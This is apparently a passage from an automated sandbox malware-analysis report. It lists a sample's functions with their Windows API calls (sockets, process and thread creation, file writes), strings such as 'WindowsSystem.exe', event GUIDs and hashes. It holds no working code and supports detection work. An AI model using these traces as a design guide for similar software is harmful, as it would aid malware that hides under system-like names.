                                                                                                            • Opcode Fuzzy Hash: 8af4a9881c6af874fac3f47403e65f13032b72895fdc5414c703560e06f8b1e7
                                                                                                            • Instruction Fuzzy Hash: E1318474A40305FBD726EBA4DC4AFBE7779AF48701F104528F609AA2D0D6749A80CB60
                                                                                                            Function 0030E110 Relevance: 36.9, APIs: 15, Strings: 6, Instructions: 149memoryprocessCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 0030E187
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 0030E1D8
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030E1E5
                                                                                                            • wnsprintfW.SHLWAPI ref: 0030E242
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030E252
                                                                                                            • wnsprintfW.SHLWAPI ref: 0030E284
                                                                                                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0030E2CB
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030E2DE
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030E2EB
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030E2F8
                                                                                                            • OpenEventW.KERNEL32(00100002,00000000,{DD700AA6-D197-4A4A-838A-B93EA96F236B}), ref: 0030E30A
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 0030E31D
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0030E327
                                                                                                            • shutdown.WS2_32(?,00000002), ref: 0030E333
                                                                                                            • closesocket.WS2_32(?), ref: 0030E33D
                                                                                                              • Part of subcall function 0030B6D0: CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0030B701
                                                                                                              • Part of subcall function 0030B6D0: GetLastError.KERNEL32 ref: 0030B70C
                                                                                                              • Part of subcall function 0030B6D0: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030B724
                                                                                                              • Part of subcall function 0030B6D0: __snwprintf.LIBCMT ref: 0030B74E
                                                                                                              • Part of subcall function 0030B6D0: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0030B773
                                                                                                              • Part of subcall function 0030B6D0: GetLastError.KERNEL32 ref: 0030B77C
                                                                                                              • Part of subcall function 0030B6D0: LocalFree.KERNEL32(00000000), ref: 0030B7FC
                                                                                                              • Part of subcall function 0030B6D0: LocalFree.KERNEL32(00000000), ref: 0030B806
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$AllocCreateEvent$ErrorLastwnsprintf$CloseDirectoryFileHandleOpenProcess__snwprintfclosesocketsetsockoptshutdown
                                                                                                            • String ID: "%s" %s$%s%s$D$WindowsSystem.exe${0F01F64A-5A5B-4CC4-B069-D85368F634DD}${DD700AA6-D197-4A4A-838A-B93EA96F236B}
                                                                                                            • API String ID: 2452205246-3446471135
                                                                                                            • Opcode ID: 99f339d34feb12b2d964579b71fa9e9e34c3d83888948618176e05a29208d458
                                                                                                            • Instruction ID: b0eff8b6dee8b2a600409c68ca380be9f6b81f023708e6900f41d7cd49a28287
                                                                                                            • Opcode Fuzzy Hash: 99f339d34feb12b2d964579b71fa9e9e34c3d83888948618176e05a29208d458
                                                                                                            • Instruction Fuzzy Hash: 58513CB1A00218AFDB35EFA4DC49BADB779BF48700F1085A8F60DA7291DB745984CF51
                                                                                                            Function 003169A0 Relevance: 35.1, APIs: 14, Strings: 6, Instructions: 145threadnetworkstringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(UNLOAD.TXT), ref: 003169AE
                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 003169C0
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,0030BA30,00000000,00000000,00000000), ref: 003169E3
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00316A01
                                                                                                            • _memset.LIBCMT ref: 00316A7A
                                                                                                            • __snwprintf.LIBCMT ref: 00316A9F
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00316AD9
                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00316B24
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,0030F100,00000000,00000000,00000000), ref: 00316B47
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00316B64
                                                                                                            • WSAStartup.WS2_32(00000002,?), ref: 00316B73
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,0031B630,00000000,00000000,00000000), ref: 00316B95
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00321030,00000000,00000000,00000000), ref: 00316BAF
                                                                                                            • WSACleanup.WS2_32 ref: 00316BCA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Create$Thread$EventFreeLocal$CleanupCloseHandleStartup__snwprintf_memsetlstrlen
                                                                                                            • String ID: "%s%s"$UNLOAD.TXT$WindowsSystem$WindowsSystem$WindowsSystem.exe${34E50511-FBB8-42F8-98A2-2629192A03A0}
                                                                                                            • API String ID: 990009833-1681456302
                                                                                                            • Opcode ID: 8a9ad51967b76f7d1d183c917680fc54247895e0dac74e6357ee31005a2150f9
                                                                                                            • Instruction ID: d04372202399d70874e7a4bf35babbc6038ecf2cca43f0f5e7fd1dddfde06e52
                                                                                                            • Opcode Fuzzy Hash: 8a9ad51967b76f7d1d183c917680fc54247895e0dac74e6357ee31005a2150f9
                                                                                                            • Instruction Fuzzy Hash: 9F516170A90314ABE73B9BA4EC8BFD5366CAB09B05F108058F60DBA1E1D7F569C4CB15
                                                                                                            Function 0030FAD0 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 136memoryfileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 0030FE20: SHGetKnownFolderPath.SHELL32(?,00000000,00000000,?), ref: 0030FE74
                                                                                                              • Part of subcall function 0030FE20: lstrlenW.KERNEL32(?), ref: 0030FE86
                                                                                                              • Part of subcall function 0030FE20: lstrlenW.KERNEL32(00371110), ref: 0030FE99
                                                                                                              • Part of subcall function 0030FE20: LocalAlloc.KERNEL32(00000040,?), ref: 0030FEB2
                                                                                                              • Part of subcall function 0030FE20: __snwprintf.LIBCMT ref: 0030FEDA
                                                                                                              • Part of subcall function 0030FE20: lstrlenW.KERNEL32(00000000), ref: 0030FEE6
                                                                                                              • Part of subcall function 0030FE20: CoTaskMemFree.COMBASE(?), ref: 0030FEF5
                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0030FB03
                                                                                                            • GetLastError.KERNEL32 ref: 0030FB0E
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030FB26
                                                                                                            • wsprintfW.USER32 ref: 0030FB4F
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0030FB7A
                                                                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 0030FBD1
                                                                                                            • GetLastError.KERNEL32 ref: 0030FBDD
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030FC72
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030FC7C
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030FC86
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030FCE3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$lstrlen$AllocCreateErrorFileLast$DirectoryFolderKnownModuleNamePathTask__snwprintfwsprintf
                                                                                                            • String ID: %s%s$P
                                                                                                            • API String ID: 4093884390-50959982
                                                                                                            • Opcode ID: 73beb8de7439dd7bbe0df55db1b6cb759280ce4f87a3ef3c13a8cc9d828dca3c
                                                                                                            • Instruction ID: e2130df5b81aa17f0d8f230cf37973d7db48985b25aa08facc0b4f702f53dc45
                                                                                                            • Opcode Fuzzy Hash: 73beb8de7439dd7bbe0df55db1b6cb759280ce4f87a3ef3c13a8cc9d828dca3c
                                                                                                            • Instruction Fuzzy Hash: DE518074901218EFDB35DBA4EC9DBADBB78AF48311F1046A8E519A65D0C7349EC4CF50
                                                                                                            Function 00313450 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 114memorystringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SHGetKnownFolderPath.SHELL32(00337C30,00000000,00000000,00000000), ref: 0031346D
                                                                                                            • _memset.LIBCMT ref: 00313492
                                                                                                            • lstrlenW.KERNEL32(00000000), ref: 0031349E
                                                                                                            • __snwprintf.LIBCMT ref: 003134D5
                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 003134E6
                                                                                                            • GetLastError.KERNEL32 ref: 00313508
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000208), ref: 00313520
                                                                                                            • __snwprintf.LIBCMT ref: 00313551
                                                                                                            • lstrlenW.KERNEL32(00000000), ref: 00313560
                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00313575
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000208), ref: 00313591
                                                                                                            • _memmove.LIBCMT ref: 003135C2
                                                                                                            • CoTaskMemFree.COMBASE(00000000), ref: 003135CE
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003135DB
                                                                                                            • RemoveDirectoryW.KERNEL32(00000000), ref: 003135F0
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003135FD
                                                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 0031360A
                                                                                                            • CoTaskMemFree.COMBASE(00000000), ref: 00313614
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: DirectoryFreeLocal$AllocCreateRemoveTask__snwprintflstrlen$ErrorFolderKnownLastPath_memmove_memset
                                                                                                            • String ID: %s\System32$\\?\%s
                                                                                                            • API String ID: 2912166009-2868705786
                                                                                                            • Opcode ID: 529e0214e7baa64189f6442e99802ce85beadac7962c01a1aa36ef115061137d
                                                                                                            • Instruction ID: 01a391380d7085d992b94ac700614c63812cd1f4b5ffa8c628cf966b9ecb7d73
                                                                                                            • Opcode Fuzzy Hash: 529e0214e7baa64189f6442e99802ce85beadac7962c01a1aa36ef115061137d
                                                                                                            • Instruction Fuzzy Hash: 85413CB4980218EBDB35DBA0DC8DBE9B779AB58701F104998E509A6290D7749FC4CF90
                                                                                                            Function 00308A80 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 169stringmemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00310010: SHGetKnownFolderPath.SHELL32(00337C00,00000000,00000000,00316B10,00371178,00316B10), ref: 00310023
                                                                                                              • Part of subcall function 00310010: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 00310034
                                                                                                              • Part of subcall function 00310010: wnsprintfW.SHLWAPI ref: 0031005F
                                                                                                              • Part of subcall function 00310010: lstrlenW.KERNEL32(?), ref: 00310070
                                                                                                              • Part of subcall function 00310010: CoTaskMemFree.COMBASE(?), ref: 0031007F
                                                                                                              • Part of subcall function 003081C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,00308D2B,00316B10,00000000), ref: 003081EB
                                                                                                              • Part of subcall function 003081C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,00308D2B), ref: 00308205
                                                                                                              • Part of subcall function 003081C0: wnsprintfW.SHLWAPI ref: 00308235
                                                                                                              • Part of subcall function 003081C0: wnsprintfW.SHLWAPI ref: 00308251
                                                                                                              • Part of subcall function 003081C0: LocalFree.KERNEL32(00000000), ref: 00308A43
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00308AE0
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00308AF0
                                                                                                            • LocalAlloc.KERNEL32(00000040,00030010), ref: 00308B3B
                                                                                                            • LocalAlloc.KERNEL32(00000040,00008AD0), ref: 00308B55
                                                                                                            • _memmove.LIBCMT ref: 00308B76
                                                                                                            • lstrcpyW.KERNEL32(00000000,00000000), ref: 00308B86
                                                                                                            • lstrcpyW.KERNEL32(-00010000,00000000), ref: 00308B99
                                                                                                            • lstrcpyW.KERNEL32(-00020000,00000000), ref: 00308BAD
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00308C32
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00308C3C
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00308C46
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00308C57
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00308C61
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00308C98
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00308CA2
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00308CAC
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00308CB6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$Alloc$lstrcpywnsprintf$FolderKnownPathTaskVirtual_memmovelstrlen
                                                                                                            • String ID: (Z6
                                                                                                            • API String ID: 586337011-1190260237
                                                                                                            • Opcode ID: dcab5cde57b296f8d014c0a02f37067a44802a88523bd4469adcd7a8e9c3f847
                                                                                                            • Instruction ID: b4e13bdbfcffb70ae52c49106885a9330430faf0c68872b03cad7c92534859cf
                                                                                                            • Opcode Fuzzy Hash: dcab5cde57b296f8d014c0a02f37067a44802a88523bd4469adcd7a8e9c3f847
                                                                                                            • Instruction Fuzzy Hash: 00711C75D01208DBDB15DFA4D899BEEBBB9BF48301F148528E645BB680C7799980CF60
                                                                                                            Function 0030B6D0 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 116memoryfileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 0030FE20: SHGetKnownFolderPath.SHELL32(?,00000000,00000000,?), ref: 0030FE74
                                                                                                              • Part of subcall function 0030FE20: lstrlenW.KERNEL32(?), ref: 0030FE86
                                                                                                              • Part of subcall function 0030FE20: lstrlenW.KERNEL32(00371110), ref: 0030FE99
                                                                                                              • Part of subcall function 0030FE20: LocalAlloc.KERNEL32(00000040,?), ref: 0030FEB2
                                                                                                              • Part of subcall function 0030FE20: __snwprintf.LIBCMT ref: 0030FEDA
                                                                                                              • Part of subcall function 0030FE20: lstrlenW.KERNEL32(00000000), ref: 0030FEE6
                                                                                                              • Part of subcall function 0030FE20: CoTaskMemFree.COMBASE(?), ref: 0030FEF5
                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0030B701
                                                                                                            • GetLastError.KERNEL32 ref: 0030B70C
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030B724
                                                                                                            • __snwprintf.LIBCMT ref: 0030B74E
                                                                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0030B773
                                                                                                            • GetLastError.KERNEL32 ref: 0030B77C
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030B7FC
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030B806
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030B851
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$lstrlen$AllocCreateErrorLast__snwprintf$DirectoryFileFolderKnownPathTask
                                                                                                            • String ID: %s%s$P$WindowsSystem.exe
                                                                                                            • API String ID: 3676116642-2053195313
                                                                                                            • Opcode ID: 5831d326da179102edc572144e6840d863d9a6666a8b5ad01bfb1fe8d3664b71
                                                                                                            • Instruction ID: fc931ee16a83c947dd3f3f56f7f1b37310d7bc65cf0de4f07d89791a4bf00b80
                                                                                                            • Opcode Fuzzy Hash: 5831d326da179102edc572144e6840d863d9a6666a8b5ad01bfb1fe8d3664b71
                                                                                                            • Instruction Fuzzy Hash: 16416F75D01209EBDB22DBE4DC59BEEBB78AF48711F108528E215B62D0C7749E80CF61
                                                                                                            Function 00319150 Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 390COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: <$GET
                                                                                                            • API String ID: 0-427699995
                                                                                                            • Opcode ID: 823adb539ce1f472b3cc235dbf49946ab0b5b7e8e47bb67f2ae2ae762639b855
                                                                                                            • Instruction ID: 2d772398a3f22282e37109120a6f183f961b47ad798f4f6bfca32b1af25f9e9d
                                                                                                            • Opcode Fuzzy Hash: 823adb539ce1f472b3cc235dbf49946ab0b5b7e8e47bb67f2ae2ae762639b855
                                                                                                            • Instruction Fuzzy Hash: 59021970900318DFEB29CFA4DD95BEEB7B9BF48710F104699E509AB280D7749A85CF50
                                                                                                            Function 00319750 Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 369COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: <$GET
                                                                                                            • API String ID: 0-427699995
                                                                                                            • Opcode ID: a9eba876acba732a5e5f3b9976efd5839ce53ba24e397240f2c3bb596f27c7ec
                                                                                                            • Instruction ID: 96fba26775fe6e71989d9f6c759e1ade490ec0f9c1a95ba5bac76a0dc0e996e8
                                                                                                            • Opcode Fuzzy Hash: a9eba876acba732a5e5f3b9976efd5839ce53ba24e397240f2c3bb596f27c7ec
                                                                                                            • Instruction Fuzzy Hash: CFF10070A00218DFDB65CFA4CD99BEDB7B9BF48700F108599E54AAB280DB749AC4CF50
                                                                                                            Function 0030BA30 Relevance: 29.8, APIs: 14, Strings: 3, Instructions: 92memoryfilesynchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 0030BA41
                                                                                                            • SHGetKnownFolderPath.SHELL32(00337C00,00000000,00000000,?), ref: 0030BA5F
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030BA74
                                                                                                            • __snwprintf.LIBCMT ref: 0030BA9E
                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0030BAC0
                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 0030BAEF
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030BB00
                                                                                                            • CoTaskMemFree.COMBASE(?), ref: 0030BB0A
                                                                                                            • OpenEventW.KERNEL32(00100002,00000000,{DD700AA6-D197-4A4A-838A-B93EA96F236B}), ref: 0030BB1C
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 0030BB2F
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0030BB39
                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 0030BB4B
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030BB55
                                                                                                            • CoTaskMemFree.COMBASE(?), ref: 0030BB5F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
